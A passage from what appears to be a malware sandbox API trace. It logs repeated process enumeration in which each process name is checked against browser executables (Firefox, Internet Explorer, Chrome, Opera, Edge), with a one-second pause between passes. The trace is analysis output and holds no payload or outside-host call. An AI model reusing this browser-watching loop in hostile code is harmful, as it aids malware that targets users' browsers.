th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0186.395] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0186.395] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0186.396] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0186.396] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0186.396] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.396] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0186.396] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0186.396] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0186.396] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0186.396] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0186.396] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.396] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0186.397] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0186.397] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0186.397] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0186.397] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0186.397] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.397] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0186.397] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0186.397] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0186.397] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0186.397] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0186.397] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.398] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0186.398] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0186.398] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0186.398] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0186.398] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0186.398] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.398] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0186.399] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0186.399] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0186.399] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0186.399] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0186.399] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.399] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.399] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0186.399] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0186.399] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0186.399] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0186.399] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.399] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.400] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.400] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.400] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.400] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.400] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.400] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0186.400] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0186.400] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0186.400] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0186.400] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0186.400] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.401] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.401] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.401] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.401] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.401] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.401] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.401] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0186.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0186.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0186.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0186.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.402] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.402] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.402] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.402] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.402] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.403] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.403] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.403] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.403] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0186.403] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.403] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0186.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0186.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0186.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0186.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.403] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.404] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0186.404] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0186.404] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0186.404] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0186.404] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0186.405] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0186.406] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0186.407] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0186.407] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0186.407] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0186.407] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0186.407] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0186.407] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0186.407] CloseHandle (hObject=0xe8) returned 1 [0186.408] Sleep (dwMilliseconds=0x3e8) [0187.411] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0187.413] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.414] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0187.414] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0187.414] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0187.414] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0187.414] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0187.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.414] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0187.414] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0187.414] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0187.414] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0187.414] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0187.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.415] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0187.415] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0187.415] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0187.415] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0187.415] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.415] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0187.415] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0187.415] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0187.415] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0187.416] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.416] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0187.416] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0187.416] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0187.416] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0187.416] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.417] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0187.417] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0187.417] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0187.417] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0187.417] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.417] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0187.417] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0187.417] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0187.417] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0187.417] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.418] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0187.418] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0187.418] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0187.418] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0187.418] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.418] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0187.419] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0187.419] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0187.419] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0187.419] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0187.419] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0187.419] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0187.419] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0187.419] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0187.419] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.420] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.421] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.421] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.421] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.421] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.421] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.422] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.422] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.422] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.423] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0187.423] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0187.423] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0187.423] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0187.423] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.423] lstrcmpiA (lpString1="svchost.exe", 